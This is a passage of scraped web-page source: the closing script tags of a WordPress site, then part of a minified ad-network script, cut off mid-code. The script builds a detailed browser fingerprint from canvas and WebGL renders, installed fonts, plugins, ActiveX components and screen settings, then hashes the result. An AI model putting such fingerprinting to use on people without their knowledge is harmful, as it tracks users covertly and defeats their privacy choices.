src='https://eliant.com/wp-content/plugins/cf7-repeatable-fields/assets/js/scripts.min.js?ver=4.9.4'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6LfNAY4UAAAAAKtjbMnRV8HEUIA23rc9Dtukx_Xg&#038;ver=3.0'></script> <script type='text/javascript' src='https://eliant.com/wp-content/themes/eliant/js/app.js?ver=4.9.4'></script> <script type='text/javascript' src='https://eliant.com/wp-content/themes/eliant/js/jquery.validate.min.js?ver=4.9.4'></script> <script type='text/javascript' src='https://eliant.com/wp-content/themes/eliant/js/roundtable.js?ver=4.9.4'></script> <script type='text/javascript' src='https://eliant.com/wp-content/themes/eliant/js/misc.js?ver=4.9.4'></script> <script type='text/javascript' src='https://eliant.com/wp-includes/js/wp-embed.min.js?ver=4.9.4'></script> <script type='text/javascript' src='https://eliant.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.4.5'></script> <script type="text/javascript"> ( function( grecaptcha, sitekey ) { var wpcf7recaptcha = { execute: function() { grecaptcha.execute( sitekey, { action: 'homepage' } ).then( function( token ) { var forms = document.getElementsByTagName( 'form' ); for ( var i = 0; i < forms.length; i++ ) { var fields = forms[ i ].getElementsByTagName( 'input' ); for ( var j = 0; j < fields.length; j++ ) { var field = fields[ j ]; if ( 'g-recaptcha-response' === field.getAttribute( 'name' ) ) { field.setAttribute( 'value', token ); break; } } } } ); } }; grecaptcha.ready( wpcf7recaptcha.execute ); document.addEventListener( 'wpcf7submit', wpcf7recaptcha.execute, false ); } )( grecaptcha, '6LfNAY4UAAAAAKtjbMnRV8HEUIA23rc9Dtukx_Xg' ); </script> </body> </html>
1
!function(){var i={adBlockId:"5b9a7521991a7300107d42e1",publId:"59f754de9fb624001c97a543",blockClass:"bmadblock-5b9a7521991a7300107d42e1",iframeClass:"bmadresult-5b9a7521991a7300107d42e1",sourceURL:document.location.href.slice(0,document.location.href.length-document.location.hash.length),sourceRef:document.referrer,userAgent:navigator.userAgent,displayHost:"//ad.bitmedia.io/",displayHostSrc:"//ad.bitmedia.io/",adSuccess:!1,loadTime:3,badCode:"",badType:"filled",badColor:"#3289c7",badAdClient:"",badAdSlot:"",badAdHeight:"0",badAdWidth:"0",SourceId:"",SessionId:"",TrackImpression:"0",TrackYandex:"0",YaCounterID:""},t=function(e){this.options=this.extend(e,{}),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map,this.entropy=0,this.keyStr="",this.keyNoUAStr=""};t.prototype={extend:function(e,t){if(null===e)return t;for(var o in e)null!==e[o]&&t[o]!==e[o]&&(t[o]=e[o]);return t},getEntropy:function(){return this.entropy},get:function(){return this.x64hash128(this.keyStr,31)},getNoUA:function(){return this.x64hash128(this.keyNoUAStr,31)},init:function(){var e=[];e=this.activeXKeys(e),e=this.languageKey(e),e=this.touchEnabledKey(e),e=this.javaKey(e),e=this.colorDepthKey(e),e=this.screenResolutionKey(e),e=this.timezoneOffsetKey(e),e=this.sessionStorageKey(e),e=this.localStorageKey(e),e=this.indexedDbKey(e),e=this.addBehaviorKey(e),e=this.openDatabaseKey(e),e=this.cpuClassKey(e),e=this.webRTCKey(e),e=this.platformKey(e),e=this.doNotTrackKey(e),e=this.canvasKey(e),e=this.getWebgl(e),e=this.jsFontsKey(e),this.keyNoUAStr=e.join("~~~"),e=this.userAgentKey(e),this.keyStr=e.join("~~~")},userAgentKey:function(e){return this.options.excludeUserAgent||(e.push(navigator.userAgent),this.entropy+=10),e},touchEnabledKey:function(e){var t;t=!1;try{document.createEvent("TouchEvent")&&(t=!0)}catch(e){}return e.push("TouchEnabled: "+t),this.entropy+=1,e},languageKey:function(e){return this.options.excludeLanguage||(e.push(navigator.language),this.entropy+=5),e},javaKey:function(e){var t="NA";t=null;try{t=navigator.javaEnabled()?"true":"false",this.entropy+=1,strOut=t}catch(e){}return e.push("Java enabled: "+t),e},colorDepthKey:function(e){return this.options.excludeColorDepth||(e.push(screen.colorDepth),this.entropy+=1),e},screenResolutionKey:function(e){if(!this.options.excludeScreenResolution){var t=this.getScreenResolution();void 0!==t&&(e.push(t.join("x")),this.entropy+=5)}return e},getScreenResolution:function(){return this.options.detectScreenOrientation?screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height]:[screen.height,screen.width]},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||(e.push((new Date).getTimezoneOffset()),this.entropy+=3),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&(e.push("sessionStorageKey"),this.entropy+=1),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&(e.push(localStorage),this.entropy+=1),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&(e.push("indexedDbKey"),this.entropy+=1),e},addBehaviorKey:function(e){return document.body&&!this.options.excludeAddBehavior&&document.body.addBehavior&&e.push("addBehaviorKey"),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&(e.push("openDatabase"),this.entropy+=1),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.push(this.getNavigatorCpuClass()),e},platformKey:function(e){return this.options.excludePlatform||e.push(this.getNavigatorPlatform()),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.push(this.getDoNotTrack()),e},webRTCKey:function(e){return this.isWebRTCSupported()?e.push("WebRTC: supported"):e.push("WebRTC: not supported"),this.entropy+=1,e},isWebRTCSupported:function(){return!!window.webkitRTCPeerConnection||!!window.mozRTCPeerConnection},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&(e.push(this.getCanvasFp()),this.entropy+=5),e},jsFontsKey:function(e){var t,o,n,i,a,r,s,d,l,c,u,h;c=l=h=r=i=d=o=t=null,s=n=0;try{for(t="position: absolute; visibility: hidden; display: block !important",n=(o=["Book Antiqua","Bookman Old Style","Bradley Hand ITC","Bodoni MT","Consolas","Copperplate Gothic Bold","English Text MT","Felix Titling","Garamond","Georgia","Gentium","Haettenschweiler","Impact","Jokerman","King","Kootenay","Latha","Lalit","Lucida Grande","Magneto","Mistral","Modena","Monotype Corsiva","MV Boli","OCR A Extended","Onyx","Palatino Linotype","Parchment","Pericles","Playbill","Segoe Print","Shruti","TeX","Times","Trebuchet MS","Verdana","Verona","Arial CYR","Chiller","Berlin Sans FB","Blackadder ITC","Symbol","Webdings","Agency FB","Vijaya","Algerian","Bodoni MT Poster Compressed","Kartika","MS Mincho","MS Outlook","Segoe UI","Aharoni","Aparajita","Amienne","LuzSans-Book","ZWAdobeF","SimSun-PUA","Blackletter686 BT","Matisse ITC","Bell Gothic Std Black","David Transparent","Adobe Caslon Pro","AR BERKLEY","Australian Sunrise","Gentium Basic","Highlight LET","Adobe Myungjo Std M","GothicE","HP PSG","DejaVu Sans","Arno Pro","Futura Bk","DejaVu Sans Condensed","Euro Sign","Neurochrome","Bell Gothic Std Light","Jokerman Alts LET","Adobe Fan Heiti Std B","Baby Kruffy","Tubular","Woodcut","HGHeiseiKakugothictaiW3","YD2002","Tahoma Small Cap","Bickley Script","Unicorn","X-Files","GENISO","Frutiger SAIN Bd v.1","ZDingbats","ABSALOM","Vagabond","Year supply of fairy cakes","Myriad Condensed Web","Segoe Media Center","Coronet","Segoe Condensed","Weltron Urban","AcadEref","DecoType Naskh","Freehand521 BT","Enviro","SWGamekeys MT","Croobie","Arial Narrow Special G1","AVGmdBU","Candles","Futura Bk BT","Andy","QuickType","WP Arabic Sihafa","DigifaceWide","ELEGANCE","BRAZIL","Pepita MT","Nina","OCR B MT","Blade Runner Movie Font","Allegro BT","Lucida Blackletter","AGA Arabesque","AdLib BT","Clarendon","Monotype Sorts","Alibi","Bremen Bd BT","mono","News Gothic MT","AvantGarde Bk BT","chs_boot","Palatino","BernhardFashion BT","CloisterBlack BT","BernhardMod BT","Nokia Smiley","Boulder","Andale Mono IPA","Belwe Lt BT","Calligrapher","Belwe Cn BT","Tanseek Pro Arabic","FuturaBlack BT","Abadi MT Condensed","Mangal","Chaucer","Belwe Bd BT","DomCasual BT","Bitstream Vera Sans","URW Gothic L","GeoSlab703 Lt BT","Bitstream Vera Sans Mono","Nimbus Mono L","Heather","Antique Olive","Clarendon Cn BT","Amazone BT","Bitstream Vera Serif","Utopia","Americana BT","Map Symbols","Bitstream Charter","Aurora Cn BT","CG Omega","Lohit Punjabi","Balloon XBd BT","Akhbar MT","Courier 10 Pitch","Benguiat Bk BT","Market","Cursor","Bodoni Bk BT","Letter Gothic","Luxi Sans","Brush455 BT","Sydnie","Lohit Hindi","Lithograph","Albertus","DejaVu LGC Serif","Lydian BT","Antique Olive Compact","KacstArt","Incised901 Bd BT","Clarendon Extended","Lohit Telugu","Incised901 Lt BT","GiovanniITCTT","KacstOneFixed","Folio XBd BT","Edda","Loma","Formal436 BT","Fine Hand","Garuda","Impress BT","RefSpecialty","Sazanami Mincho","Staccato555 BT","VL Gothic","Hkmer OS","WP BoxDrawing","Clarendon Blk BT","Droid Sans","CommonBullets","Sherwood","CopprplGoth Bd BT","Smudger Alts LET","BPG Rioni","CopprplGoth BT","Estrangelo TurAbdin","Dauphin","Arial Tur","English111 Vivace BT","Steamer","OzHandicraft BT","Arial Cyr","Futura Lt BT","Liberation Sans Narrow","Futura XBlk BT","Candy Round BTN Cond","GoudyHandtooled BT","GrilledCheese BTN Cn","GoudyOlSt BT","Galeforce BTN","Kabel Bk BT","Sneakerhead BTN Shadow","OCR-A BT","Denmark","OCR-B 10 BT","Swiss921 BT","PosterBodoni BT","Arial (Arabic)","Serifa BT","FlemishScript BT","American Typewriter","Apple Symbols","AppleMyungjo","Zapfino","BlairMdITC TT-Medium","Cracked","KufiStandardGK","Plantagenet Cherokee","Apple Casual","Type Embellishments One LET","Abadi MT Condensed Extra Bold","Calibri Bold","Calisto MT","Chalkduster","Franklin Gothic Book Italic","Geneva CY","Franklin Gothic Book","Helvetica Light","Gill Sans MT","Bank Gothic","Bodoni SvtyTwo SC ITC TT-Book","Tekton Pro","Courier CE","Maestro","BO Futura BoldOblique","Lucida Bright Demibold","New","AGaramond","Charcoal","DIN-Black","Lucida Sans Demibold","Stone Sans OS ITC TT-Bold","AGaramond Italic","Bickham Script Pro Regular","Adobe Arabic Bold","AGaramond Semibold","Al Bayan Bold","Doremi","AGaramond SemiboldItalic","Arno Pro Bold","B Futura Bold","Frutiger 47LightCn","Gadget","HelveticaNeueLT Std Bold","Frutiger 57Cn","DejaVu Serif Italic Condensed","Myriad Pro Black It","Frutiger 67BoldCn","Gentium Basic Bold","Sand","GillSans","H Futura Heavy","Liberation Mono Bold","GillSans Bold","Courier Final Draft","HelveticaNeue BlackCond","Techno","HelveticaNeue BlackCondObl","Gabriola","JazzText Extended","HelveticaNeue BlackExt","Textile","HelveticaNeue BlackExtObl fantasy","HelveticaNeue BoldCond","Palatino Linotype Bold","HelveticaNeue BoldCondObl","BIRTH OF A HERO","HelveticaNeue BoldExt","Bleeding Cowboys","HelveticaNeue BoldExtObl","ChopinScript","HelveticaNeue ExtBlackCond","HelveticaNeue ExtBlackCondObl","HelveticaNeue HeavyCond","HelveticaNeue HeavyCondObl","OpenSymbol","HelveticaNeue HeavyExt","HelveticaNeue HeavyExtObl","HelveticaNeue LightCondObl","Nueva Std","HelveticaNeue ThinCond","Chicago","HelveticaNeue ThinCondObl","Nueva Std Bold","Brush Script MT","Capitals","Avant Garde","B Avant Garde Demi","Nueva Std Bold Italic","BI Avant Garde DemiOblique","MaestroTimes","Univers BoldExtObl","APC Courier","Myriad Web Pro Bold","Myriad Pro Light","Carta","DIN-Bold","DIN-Light","Myriad Web Pro Condensed Italic","DIN-Medium","Tekton Pro Oblique","DIN-Regular","AScore","HelveticaNeue UltraLigCondObl","HelveticaNeue UltraLigExt","Myriad Pro Light It","HelveticaNeue UltraLigExtObl","HO Futura HeavyOblique","Opus Japanese Chords","L Frutiger Light","VT100","L Futura Light","LO Futura LightOblique","Myriad Pro Black","New York","O Futura BookOblique","R Frutiger Roman","Reprise","TradeGothic","Warnock Pro Bold Caption","Univers 45 Light","Warnock Pro","XBO Futura ExtraBoldOblique","Univers 45 LightOblique","Liberation Mono","Univers 55 Oblique","UC LCD","Univers 57 Condensed","Warnock Pro Bold","Univers ExtraBlack","Warnock Pro Light Ital Subhead","Univers LightUltraCondensed","Matrix Ticker","Univers UltraCondensed","Fang Song"]).length,i="<b style=\"display:inline !important; width:auto !important; font:normal 40px/1 'X',sans-serif !important\">ww</b><br/><b style=\"display:inline !important; width:auto !important; font:normal 40px/1 'X',monospace !important\">ww</b>",a=document.createDocumentFragment(),r=[],s=0;s<n;s+=1)d=o[s],l=document.createElement("div"),d=d.replace(/['"<>]/g,""),l.innerHTML=i.replace(/X/g,d),l.style.cssText=t,a.appendChild(l),r.push(l);for((c=document.body).insertBefore(a,c.firstChild),u=[],s=0;s<n;s+=1)(h=r[s].getElementsByTagName("b"))[0].offsetWidth===h[1].offsetWidth&&u.push(o[s]);for(s=0;s<n;s+=1)c.removeChild(r[s]);this.entropy+=8,e.push(u.join("|"))}catch(e){return"error"}return e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},getWebglHash:function(e,t){var o=e.createBuffer();e.bindBuffer(e.ARRAY_BUFFER,o);var n=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.732134444,0]);e.bufferData(e.ARRAY_BUFFER,n,e.STATIC_DRAW),o.itemSize=3,o.numItems=3;var i=e.createProgram(),a=e.createShader(e.VERTEX_SHADER);e.shaderSource(a,"attribute vec2 attrVertex; varying vec2 varyinTexCoordinate; uniform vec2 uniformOffset; void main() { varyinTexCoordinate = attrVertex + uniformOffset; gl_Position = vec4(attrVertex, 0, 1); }"),e.compileShader(a);var r=e.createShader(e.FRAGMENT_SHADER);return e.shaderSource(r,"precision mediump float; varying vec2 varyinTexCoordinate; void main() { gl_FragColor = vec4(varyinTexCoordinate, 0, 1); }"),e.compileShader(r),e.attachShader(i,a),e.attachShader(i,r),e.linkProgram(i),e.useProgram(i),i.vertexPosAttrib=e.getAttribLocation(i,"attrVertex"),i.offsetUniform=e.getUniformLocation(i,"uniformOffset"),e.enableVertexAttribArray(i.vertexPosArray),e.vertexAttribPointer(i.vertexPosAttrib,o.itemSize,e.FLOAT,!1,0,0),e.uniform2f(i.offsetUniform,1,1),e.drawArrays(e.TRIANGLE_STRIP,0,o.numItems),this.x64hash128(t.toDataURL(),31)},getWebgl:function(e){var t,o=document.createElement("canvas"),n=[];try{t=o.getContext("webgl")||o.getContext("experimental-webgl")}catch(e){}if(!t)return e;try{n=n.concat(t.getSupportedExtensions())}catch(e){}try{n.push(this.getWebglHash(t,o)),this.entropy+=5}catch(e){}return e.push(n.join("|")),e},activeXKeys:function(e){var d=this;function l(e){var t;t="";try{return null!==(t=document.body.getComponentVersion("{"+e+"}","ComponentID"))&&t}catch(e){return glbOnError}}function t(e){var t,o;for(t=!1,o=o=0;o<this.hashtable.length;o+=1)if(o===e&&null!==this.hashtable[o]){t=!0;break}return t}function o(e){return this.hashtable[e]}function n(){var e,t;for(t in e=[],t=0,this.hashtable)null!==this.hashtable[t]&&e.push(t);return e}function i(e,t){if(null===e||null===t)throw"NullPointerException {"+e+"},{"+t+"}";this.hashtable[e]=t}function a(){var e,t;for(t in t=e=0,this.hashtable)null!==this.hashtable[t]&&(e+=1);return e}function c(){this.containsKey=t,this.get=o,this.keys=n,this.put=i,this.size=a,this.hashtable=[]}var r=function(){var e,t,o,n,i,a,r,s;try{if((e=new c).put("7790769C-0471-11D2-AF11-00C04FA35D02","AddressBook"),e.put("47F67D00-9E55-11D1-BAEF-00C04FC2D130","AolArtFormat"),e.put("76C19B38-F0C8-11CF-87CC-0020AFEECF20","ArabicDS"),e.put("76C19B34-F0C8-11CF-87CC-0020AFEECF20","ChineseSDS"),e.put("76C19B33-F0C8-11CF-87CC-0020AFEECF20","ChineseTDS"),e.put("238F6F83-B8B4-11CF-8771-00A024541EE3","CitrixICA"),e.put("283807B5-2C60-11D0-A31D-00AA00B92C03","DirectAnim"),e.put("44BBA848-CC51-11CF-AAFA-00AA00B6015C","DirectShow"),e.put("9381D8F2-0288-11D0-9501-00AA00B911A5","DynHTML"),e.put("4F216970-C90C-11D1-B5C7-0000F8051515","DynHTML4Java"),e.put("D27CDB6E-AE6D-11CF-96B8-444553540000","Flash"),e.put("76C19B36-F0C8-11CF-87CC-0020AFEECF20","HebrewDS"),e.put("630B1DA0-B465-11D1-9948-00C04F98BBC9","IEBrwEnh"),e.put("08B0E5C0-4FCB-11CF-AAA5-00401C608555","IEClass4Java"),e.put("45EA75A0-A269-11D1-B5BF-0000F8051515","IEHelp"),e.put("DE5AED00-A4BF-11D1-9948-00C04F98BBC9","IEHelpEng"),e.put("89820200-ECBD-11CF-8B85-00AA005B4383","IE5WebBrw"),e.put("5A8D6EE0-3E18-11D0-821E-444553540000","InetConnectionWiz"),e.put("76C19B30-F0C8-11CF-87CC-0020AFEECF20","JapaneseDS"),e.put("76C19B31-F0C8-11CF-87CC-0020AFEECF20","KoreanDS"),e.put("76C19B50-F0C8-11CF-87CC-0020AFEECF20","LanguageAS"),e.put("08B0E5C0-4FCB-11CF-AAA5-00401C608500","MsftVM"),e.put("5945C046-LE7D-LLDL-BC44-00C04FD912BE","MSNMessengerSrv"),e.put("44BBA842-CC51-11CF-AAFA-00AA00B6015B","NetMeetingNT"),e.put("3AF36230-A269-11D1-B5BF-0000F8051515","OfflineBrwPack"),e.put("44BBA840-CC51-11CF-AAFA-00AA00B6015C","OutlookExpress"),e.put("76C19B32-F0C8-11CF-87CC-0020AFEECF20","PanEuropeanDS"),e.put("4063BE15-3B08-470D-A0D5-B37161CFFD69","QuickTime"),e.put("DE4AF3B0-F4D4-11D3-B41A-0050DA2E6C21","QuickTimeCheck"),e.put("3049C3E9-B461-4BC5-8870-4C09146192CA","RealPlayer"),e.put("2A202491-F00D-11CF-87CC-0020AFEECF20","ShockwaveDir"),e.put("3E01D8E0-A72B-4C9F-99BD-8A6E7B97A48D","Skype"),e.put("CC2A9BA0-3BDD-11D0-821E-444553540000","TaskScheduler"),e.put("76C19B35-F0C8-11CF-87CC-0020AFEECF20","ThaiDS"),e.put("3BF42070-B3B1-11D1-B5C5-0000F8051515","Uniscribe"),e.put("4F645220-306D-11D2-995D-00C04F98BBC9","VBScripting"),e.put("76C19B37-F0C8-11CF-87CC-0020AFEECF20","VietnameseDS"),e.put("10072CEC-8CC1-11D1-986E-00A0C955B42F","VML"),e.put("90E2BA2E-DD1B-4CDE-9134-7A8B86D33CA7","WebEx"),e.put("73FA19D0-2D75-11D2-995D-00C04F98BBC9","WebFolders"),e.put("89820200-ECBD-11CF-8B85-00AA005B4340","WinDesktopUpdateNT"),e.put("9030D464-4C02-4ABF-8ECC-5164760863C6","WinLive"),e.put("6BF52A52-394A-11D3-B153-00C04F79FAA6","WinMediaPlayer"),e.put("22D6F312-B0F6-11D0-94AB-0080C74C7E95","WinMediaPlayerTrad"),a=!(i=""),0<navigator.plugins.length)for(r=0;r<navigator.plugins.length;r+=1)!0===a?(i+=navigator.plugins[r].name,i+=navigator.plugins[r].description,a=!1):(i+=navigator.plugins[r].name,i+=navigator.plugins[r].description);else if(0<navigator.mimeTypes.length)for(s=navigator.mimeTypes,r=0;r<s.length;r+=1)!0===a?(i+=s[r].description,a=!1):i+=s[r].description;else{for(document.body.addBehavior("#default#clientCaps"),t=e.keys(),r=0;r<e.size();r+=1)n=l(t[r]),o=e.get(t[r]),n&&(!0===a?(i=o+n+"; ",a=!1):i+=o+n+"; ");i=i.replace(/,/g,".")}return""===(i=function(e){var t,o,n;t=0,n=o="";try{for(o=e.toLowerCase(),t=0;t<o.length;t+=1)"\n"!==o.charAt(t)&&"/"!==o.charAt(t)&&"\\"!==o.charAt(t)?n+=o.charAt(t):"\n"===o.charAt(t)&&(n+="n");return n}catch(e){return glbOnError}}(i))?i="None":d.entropy+=11,i}catch(e){return"NA"}}();return e.push("Plugins: "+r),e},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){return!!window.indexedDB},getNavigatorCpuClass:function(){return navigator.cpuClass?(this.entropy+=3,"navigatorCpuClass: "+navigator.cpuClass):"navigatorCpuClass: unknown"},getNavigatorPlatform:function(){return navigator.platform?(this.entropy+=2,"navigatorPlatform: "+navigator.platform):"navigatorPlatform: unknown"},getDoNotTrack:function(){return navigator.doNotTrack?(this.entropy+=1,"doNotTrack: "+navigator.doNotTrack):"doNotTrack: unknown"},getCanvasFp:function(){var e=document.createElement("canvas"),t=e.getContext("2d"),o="Cwm fjordbank glyphs vext quiz, https://github.com/valve á½ ";return t.textBaseline="top",t.font="70px 'Arial'",t.textBaseline="alphabetic",t.fillStyle="#f60",t.fillRect(125,1,62,20),t.fillStyle="#069",t.fillText(o,2,15),t.fillStyle="rgba(102, 204, 0, 0.7)",t.fillText(o,4,17),e.toDataURL()},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},each:function(e,t,o){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,o);else if(e.length===+e.length){for(var n=0,i=e.length;n<i;n++)if(t.call(o,e[n],n,e)==={})return}else for(var a in e)if(e.hasOwnProperty(a)&&t.call(o,e[a],a,e)==={})return},map:function(e,n,i){var a=[];return null==e?a:this.nativeMap&&e.map===this.nativeMap?e.map(n,i):(this.each(e,function(e,t,o){a[a.length]=n.call(i,e,t,o)}),a)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var o=[0,0,0,0];return o[3]+=e[3]+t[3],o[2]+=o[3]>>>16,o[3]&=65535,o[2]+=e[2]+t[2],o[1]+=o[2]>>>16,o[2]&=65535,o[1]+=e[1]+t[1],o[0]+=o[1]>>>16,o[1]&=65535,o[0]+=e[0]+t[0],o[0]&=65535,[o[0]<<16|o[1],o[2]<<16|o[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var o=[0,0,0,0];return o[3]+=e[3]*t[3],o[2]+=o[3]>>>16,o[3]&=65535,o[2]+=e[2]*t[3],o[1]+=o[2]>>>16,o[2]&=65535,o[2]+=e[3]*t[2],o[1]+=o[2]>>>16,o[2]&=65535,o[1]+=e[1]*t[3],o[0]+=o[1]>>>16,o[1]&=65535,o[1]+=e[2]*t[2],o[0]+=o[1]>>>16,o[1]&=65535,o[1]+=e[3]*t[1],o[0]+=o[1]>>>16,o[1]&=65535,o[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],o[0]&=65535,[o[0]<<16|o[1],o[2]<<16|o[3]]},x64Rotl:function(e,t){return 32===(t%=64)?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return 0===(t%=64)?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){t=t||0;for(var o=(e=e||"").length%16,n=e.length-o,i=[0,t],a=[0,t],r=[0,0],s=[0,0],d=[2277735313,289559509],l=[1291169091,658871167],c=0;c<n;c+=16)r=[255&e.charCodeAt(c+4)|(255&e.charCodeAt(c+5))<<8|(255&e.charCodeAt(c+6))<<16|(255&e.charCodeAt(c+7))<<24,255&e.charCodeAt(c)|(255&e.charCodeAt(c+1))<<8|(255&e.charCodeAt(c+2))<<16|(255&e.charCodeAt(c+3))<<24],s=[255&e.charCodeAt(c+12)|(255&e.charCodeAt(c+13))<<8|(255&e.charCodeAt(c+14))<<16|(255&e.charCodeAt(c+15))<<24,255&e.charCodeAt(c+8)|(255&e.charCodeAt(c+9))<<8|(255&e.charCodeAt(c+10))<<16|(255&e.charCodeAt(c+11))<<24],r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),i=this.x64Xor(i,r),i=this.x64Rotl(i,27),i=this.x64Add(i,a),i=this.x64Add(this.x64Multiply(i,[0,5]),[0,1390208809]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s),a=this.x64Rotl(a,31),a=this.x64Add(a,i),a=this.x64Add(this.x64Multiply(a,[0,5]),[0,944331445]);switch(r=[0,0],s=[0,0],o){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(c+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(c+8)]),s=this.x64Multiply(s,l),s=this.x64Rotl(s,33),s=this.x64Multiply(s,d),a=this.x64Xor(a,s);case 8:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+7)],56));case 7:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+6)],48));case 6:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+5)],40));case 5:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+4)],32));case 4:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+3)],24));case 3:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+2)],16));case 2:r=this.x64Xor(r,this.x64LeftShift([0,e.charCodeAt(c+1)],8));case 1:r=this.x64Xor(r,[0,e.charCodeAt(c)]),r=this.x64Multiply(r,d),r=this.x64Rotl(r,31),r=this.x64Multiply(r,l),i=this.x64Xor(i,r)}return i=this.x64Xor(i,[0,e.length]),a=this.x64Xor(a,[0,e.length]),i=this.x64Add(i,a),a=this.x64Add(a,i),i=this.x64Fmix(i),a=this.x64Fmix(a),i=this.x64Add(i,a),a=this.x64Add(a,i),("00000000"+(i[0]>>>0).toString(16)).slice(-8)+("00000000"+(i[1]>>>0).toString(16)).slice(-8)+("00000000"+(a[0]>>>0).toString(16)).slice(-8)+("00000000"+(a[1]>>>0).toString(16)).slice(-8)}};var n,a,e,o,r=r||(n=function(e,t,o){return e.length>=t?e:n(o+e,t,o||" ")},a=function(e){var t=e.toString(16);return n(t,4,"0")},{new:function(){var o,e,t=void 0!==window.crypto,n=window.crypto&&void 0!==window.crypto.getRandomValues;return t&&n?(e=new window.Uint16Array(8),window.crypto.getRandomValues(e),[a(e[0])+a(e[1]),a(e[2]),a(e[3]),a(e[4]),a(e[5])+a(e[6])+a(e[7])].join("-")).split("-").join(""):(o=(new Date).getTime(),"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(e){var t=(o+16*Math.random())%16|0;return o=Math.floor(o/16),("x"===e?t:7&t|8).toString(16)})).split("-").join("")}}),c={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t,o,n,i,a,r,s,d="",l=0;for(e=c._utf8_encode(e);l<e.length;)i=(t=e.charCodeAt(l++))>>2,a=(3&t)<<4|(o=e.charCodeAt(l++))>>4,r=(15&o)<<2|(n=e.charCodeAt(l++))>>6,s=63&n,isNaN(o)?r=s=64:isNaN(n)&&(s=64),d=d+this._keyStr.charAt(i)+this._keyStr.charAt(a)+this._keyStr.charAt(r)+this._keyStr.charAt(s);return d},decode:function(e){var t,o,n,i,a,r,s="",d=0;for(e=e.replace(/[^A-Za-z0-9\+\/\=]/g,"");d<e.length;)t=this._keyStr.indexOf(e.charAt(d++))<<2|(i=this._keyStr.indexOf(e.charAt(d++)))>>4,o=(15&i)<<4|(a=this._keyStr.indexOf(e.charAt(d++)))>>2,n=(3&a)<<6|(r=this._keyStr.indexOf(e.charAt(d++))),s+=String.fromCharCode(t),64!=a&&(s+=String.fromCharCode(o)),64!=r&&(s+=String.fromCharCode(n));return s=c._utf8_decode(s)},_utf8_encode:function(e){e=e.replace(/\r\n/g,"\n");for(var t="",o=0;o<e.length;o++){var n=e.charCodeAt(o);n<128?t+=String.fromCharCode(n):(127<n&&n<2048?t+=String.fromCharCode(n>>6|192):(t+=String.fromCharCode(n>>12|224),t+=String.fromCharCode(n>>6&63|128)),t+=String.fromCharCode(63&n|128))}return t},_utf8_decode:function(e){for(var t="",o=0,n=c1=c2=0;o<e.length;)(n=e.charCodeAt(o))<128?(t+=String.fromCharCode(n),o++):191<n&&n<224?(c2=e.charCodeAt(o+1),t+=String.fromCharCode((31&n)<<6|63&c2),o+=2):(c2=e.charCodeAt(o+1),c3=e.charCodeAt(o+2),t+=String.fromCharCode((15&n)<<12|(63&c2)<<6|63&c3),o+=3);return t}},s=function(e){var 